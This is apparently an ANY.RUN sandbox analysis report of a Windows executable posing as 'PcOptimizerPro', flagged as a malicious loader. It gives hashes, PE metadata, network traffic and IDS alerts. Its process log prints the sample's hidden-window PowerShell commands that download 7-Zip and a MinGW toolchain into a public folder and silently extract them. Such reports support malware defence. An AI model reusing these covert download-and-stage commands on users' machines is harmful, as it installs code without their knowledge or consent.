| File name: | PcOptimizerPro.exe |
| Full analysis: | https://app.any.run/tasks/5d197c0f-b3c6-48e7-886e-5afbf647e958 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | October 03, 2025, 17:06:49 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32+ executable (console) x86-64, for MS Windows, 6 sections |
| MD5: | 7A37DFB22CEAF682738E4DE87E8B81F1 |
| SHA1: | C31499D713FEA0A163A0CB8364261CFCFACAB1A5 |
| SHA256: | 7728C17E5019CE6DC7DEEF83F1C9612DC7617EF595D1A93AE8424D12C7282946 |
| SSDEEP: | 768:fydhnBdDzuGPT5fda8SSwREYTQsr99fiBnwoxGz9JRJP9NWOOMOTDv3bjE:uZP/aHGsh9TfpMOOLjjE |
| .exe | | | Win64 Executable (generic) (87.3) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (6.3) |
| .exe | | | DOS Executable Generic (6.3) |
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2025:10:03 17:01:21+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware |
| PEType: | PE32+ |
| LinkerVersion: | 14.44 |
| CodeSize: | 27136 |
| InitializedDataSize: | 29184 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x66f8 |
| OSVersion: | 6 |
| ImageVersion: | - |
| SubsystemVersion: | 6 |
| Subsystem: | Windows command line |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1216 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | PcOptimizerPro.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2128 | C:\Users\Public\7zr.exe x C:\Users\Public\mingw.7z -oC:\Users\Public\ -y | C:\Users\Public\7zr.exe | — | cmd.exe | |||||||||||
User: admin Company: Igor Pavlov Integrity Level: MEDIUM Description: 7-Zip Reduced Standalone Console Version: 25.01 Modules
| |||||||||||||||
| 2176 | C:\WINDOWS\system32\cmd.exe /c g++ --version 2>nul | C:\Windows\System32\cmd.exe | — | PcOptimizerPro.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2192 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4108 | C:\WINDOWS\system32\cmd.exe /c C:\Users\Public\7zr.exe x C:\Users\Public\mingw.7z -oC:\Users\Public\ -y >nul 2>&1 | C:\Windows\System32\cmd.exe | — | PcOptimizerPro.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4444 | C:\WINDOWS\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri 'https://github.com/niXman/mingw-builds-binaries/releases/download/13.2.0-rt_v11-rev0/x86_64-13.2.0-release-posix-seh-msvcrt-rt_v11-rev0.7z' -OutFile 'C:\Users\Public\mingw.7z' }" >nul 2>&1 | C:\Windows\System32\cmd.exe | — | PcOptimizerPro.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4584 | powershell -WindowStyle Hidden -Command "& {$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri 'https://github.com/niXman/mingw-builds-binaries/releases/download/13.2.0-rt_v11-rev0/x86_64-13.2.0-release-posix-seh-msvcrt-rt_v11-rev0.7z' -OutFile 'C:\Users\Public\mingw.7z' }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6120 | "C:\Users\admin\Desktop\PcOptimizerPro.exe" | C:\Users\admin\Desktop\PcOptimizerPro.exe | — | explorer.exe | |||||||||||
User: admin Integrity Level: MEDIUM Modules
| |||||||||||||||
| 6388 | powershell -WindowStyle Hidden -Command "& {$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri 'https://www.7-zip.org/a/7zr.exe' -OutFile 'C:\Users\Public\7zr.exe' }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7980 | C:\WINDOWS\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri 'https://www.7-zip.org/a/7zr.exe' -OutFile 'C:\Users\Public\7zr.exe' }" >nul 2>&1 | C:\Windows\System32\cmd.exe | — | PcOptimizerPro.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4584 | powershell.exe | C:\Users\Public\mingw.7z | — | |
MD5:— | SHA256:— | |||
| 6388 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_x1yxjhti.aad.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4584 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rgzo0304.lj2.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6388 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0o2vkjw1.kus.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2128 | 7zr.exe | C:\Users\Public\mingw64\include\ansidecl.h | text | |
MD5:550446A6D9ED6D7ECCE30D964B346154 | SHA256:4E9B6D7A0CB0D268D268D8286FB43F913DA09A63258A4DE810950AAFD08F729A | |||
| 2128 | 7zr.exe | C:\Users\Public\mingw64\bin\gdb-add-index | text | |
MD5:EB29B62EDC43C80F0CBC1AC8345591A9 | SHA256:D7B071199ECC8224A6DFF3F62BC1920E7D195B7B11680BD91C7805430927ED0B | |||
| 2128 | 7zr.exe | C:\Users\Public\mingw64\include\ctf.h | text | |
MD5:EA965809B569D521613F1AE70194B829 | SHA256:312413A2801CDA5C936D661DF307A03D5C9329E0F44C92D628A12093E3AD4490 | |||
| 2128 | 7zr.exe | C:\Users\Public\mingw64\include\diagnostics.h | text | |
MD5:ABDCF5BDD20246C05EED95AE98DD2551 | SHA256:A92C7D29C0DF4AD62753CE7E37EC5231C572934EB5BD5A75A5F87012011F8CF3 | |||
| 4584 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:18E7FAC09ABA466B62747A3FB2A0CF88 | SHA256:C9C9A985C7A06B850427489C5E92CC828BC5A1E1F2A7A5F3000DD2F205350472 | |||
| 4584 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_oqwd30aa.cy4.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 302 | 140.82.121.4:443 | https://github.com/niXman/mingw-builds-binaries/releases/download/13.2.0-rt_v11-rev0/x86_64-13.2.0-release-posix-seh-msvcrt-rt_v11-rev0.7z | unknown | — | — | unknown |
— | — | GET | 200 | 49.12.202.237:443 | https://www.7-zip.org/a/7zr.exe | unknown | executable | 587 Kb | unknown |
— | — | GET | 200 | 185.199.111.133:443 | https://release-assets.githubusercontent.com/github-production-release-asset/446033510/00d335dc-bf12-4597-b41d-567805d2431e?sp=r&sv=2018-11-09&sr=b&spr=https&se=2025-10-03T17%3A43%3A58Z&rscd=attachment%3B+filename%3Dx86_64-13.2.0-release-posix-seh-msvcrt-rt_v11-rev0.7z&rsct=application%2Foctet-stream&skoid=96c2d410-5711-43a1-aedd-ab1947aa7ab0&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skt=2025-10-03T16%3A43%3A52Z&ske=2025-10-03T17%3A43%3A58Z&sks=b&skv=2018-11-09&sig=x8AkWRgmFv0EJ3UPVlyYfDsX41PaUYV7BKm4S0NZDkM%3D&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmVsZWFzZS1hc3NldHMuZ2l0aHVidXNlcmNvbnRlbnQuY29tIiwia2V5Ijoia2V5MSIsImV4cCI6MTc1OTUxMzAyMiwibmJmIjoxNzU5NTExMjIyLCJwYXRoIjoicmVsZWFzZWFzc2V0cHJvZHVjdGlvbi5ibG9iLmNvcmUud2luZG93cy5uZXQifQ.MhGVWA-7BQwiFvTQPhxspi-ig9aE2jWEjho2kcDG8ec&response-content-disposition=attachment%3B%20filename%3Dx86_64-13.2.0-release-posix-seh-msvcrt-rt_v11-rev0.7z&response-content-type=application%2Foctet-stream | unknown | — | 69.6 Mb | unknown |
— | — | POST | 500 | 4.154.185.43:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
3404 | RUXIMICS.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6016 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 95.101.136.194:443 | www.bing.com | Akamai International B.V. | GB | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5948 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4584 | powershell.exe | 140.82.121.4:443 | github.com | GITHUB | US | whitelisted |
4584 | powershell.exe | 185.199.111.133:443 | release-assets.githubusercontent.com | FASTLY | US | whitelisted |
6388 | powershell.exe | 49.12.202.237:443 | www.7-zip.org | Hetzner Online GmbH | DE | whitelisted |
1920 | slui.exe | 4.154.185.43:443 | activation-v2.sls.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
google.com |
| whitelisted |
github.com |
| whitelisted |
release-assets.githubusercontent.com |
| whitelisted |
www.7-zip.org |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
— | — | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW) |
2428 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Attempting to access release user assets on GitHub |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Potentially Bad Traffic | ET HUNTING 7-zip Executable Requested (GET) |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
— | — | Misc activity | ET INFO Request for EXE via Powershell |